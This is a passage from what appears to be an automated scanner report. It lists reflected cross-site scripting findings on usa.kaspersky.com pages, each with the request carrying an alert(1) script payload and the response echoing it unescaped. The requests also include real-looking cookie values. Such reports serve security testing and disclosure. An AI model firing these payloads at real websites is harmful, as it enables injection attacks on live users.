1.54. http://usa.kaspersky.com/about-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3511f"><script>alert(1)</script>455d50a023f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us3511f"><script>alert(1)</script>455d50a023f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Mobile%20Security; s_nr=1315139135058-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Mobile%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:24 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141704"
Content-Type: text/html; charset=utf-8
Content-Length: 33267
Date: Sun, 04 Sep 2011 13:08:30 GMT
X-Varnish: 1163125926
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us3511f"><script>alert(1)</script>455d50a023f" />
...[SNIP]...

1.55. http://usa.kaspersky.com/about-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830d0"-alert(1)-"320fa374e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us830d0"-alert(1)-"320fa374e08 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Mobile%20Security; s_nr=1315139135058-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Mobile%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:55 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141735"
Content-Type: text/html; charset=utf-8
Content-Length: 30545
Date: Sun, 04 Sep 2011 13:09:22 GMT
X-Varnish: 1163126865
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us830d0"-alert(1)-"320fa374e08";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.56. http://usa.kaspersky.com/about-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2d0"><script>alert(1)</script>a2fb0f73f17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us?6f2d0"><script>alert(1)</script>a2fb0f73f17=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Mobile%20Security; s_nr=1315139135058-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Mobile%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141510"
Content-Type: text/html; charset=utf-8
Content-Length: 34057
Date: Sun, 04 Sep 2011 13:05:32 GMT
X-Varnish: 1163119757
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us?6f2d0"><script>alert(1)</script>a2fb0f73f17=1" />
...[SNIP]...

1.57. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4604"><script>alert(1)</script>49eb04b0130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-use4604"><script>alert(1)</script>49eb04b0130/contact-us HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:59:47 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144787"
Content-Type: text/html; charset=utf-8
Content-Length: 35703
Date: Sun, 04 Sep 2011 13:59:50 GMT
X-Varnish: 1163230428
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-use4604"><script>alert(1)</script>49eb04b0130/contact-us" />
...[SNIP]...

1.58. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcef7"-alert(1)-"ca2b6d35942 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-usdcef7"-alert(1)-"ca2b6d35942/contact-us HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:59:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144799"
Content-Type: text/html; charset=utf-8
Content-Length: 34415
Date: Sun, 04 Sep 2011 14:00:01 GMT
X-Varnish: 1163230755
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-usdcef7"-alert(1)-"ca2b6d35942/contact-us";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.59. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43d62"-alert(1)-"396773fa193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us/contact-us43d62"-alert(1)-"396773fa193 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:00:34 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144834"
Content-Type: text/html; charset=utf-8
Content-Length: 34479
Date: Sun, 04 Sep 2011 14:00:38 GMT
X-Varnish: 1163232603
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
p4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/contact-us43d62"-alert(1)-"396773fa193";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.60. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93f3f"><script>alert(1)</script>8c4eaed748a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/contact-us93f3f"><script>alert(1)</script>8c4eaed748a HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:00:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144820"
Content-Type: text/html; charset=utf-8
Content-Length: 35768
Date: Sun, 04 Sep 2011 14:00:24 GMT
X-Varnish: 1163231801
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us93f3f"><script>alert(1)</script>8c4eaed748a" />
...[SNIP]...

1.61. http://usa.kaspersky.com/about-us/contact-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55f0"><script>alert(1)</script>c4fbba611eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/contact-us?b55f0"><script>alert(1)</script>c4fbba611eb=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:59:24 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144764"
Content-Type: text/html; charset=utf-8
Content-Length: 41989
Date: Sun, 04 Sep 2011 13:59:39 GMT
X-Varnish: 1163229645
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us?b55f0"><script>alert(1)</script>c4fbba611eb=1" />
...[SNIP]...

1.62. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb34"-alert(1)-"f6e6b16c6e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-usfeb34"-alert(1)-"f6e6b16c6e2/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:30 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145490"
Content-Type: text/html; charset=utf-8
Content-Length: 34690
Date: Sun, 04 Sep 2011 14:11:38 GMT
X-Varnish: 1163257807
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-usfeb34"-alert(1)-"f6e6b16c6e2/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.63. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a50"><script>alert(1)</script>4af2ba5c2d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us29a50"><script>alert(1)</script>4af2ba5c2d8/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:57 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145457"
Content-Type: text/html; charset=utf-8
Content-Length: 32163
Date: Sun, 04 Sep 2011 14:11:05 GMT
X-Varnish: 1163256578
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us29a50"><script>alert(1)</script>4af2ba5c2d8/index.html" />
...[SNIP]...

1.64. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb91"><script>alert(1)</script>26b2aedd759 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/index.htmlcfb91"><script>alert(1)</script>26b2aedd759 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145530"
Content-Type: text/html; charset=utf-8
Content-Length: 35488
Date: Sun, 04 Sep 2011 14:12:16 GMT
X-Varnish: 1163259209
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/index.htmlcfb91"><script>alert(1)</script>26b2aedd759" />
...[SNIP]...

1.65. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afee"-alert(1)-"30c582827e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us/index.html1afee"-alert(1)-"30c582827e1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:45 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145565"
Content-Type: text/html; charset=utf-8
Content-Length: 35563
Date: Sun, 04 Sep 2011 14:12:48 GMT
X-Varnish: 1163260505
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
p4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/index.html1afee"-alert(1)-"30c582827e1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.66. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d145"><script>alert(1)</script>2fdc71b9919 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1 HTTP/1.1
Host: usa.kaspersky.com
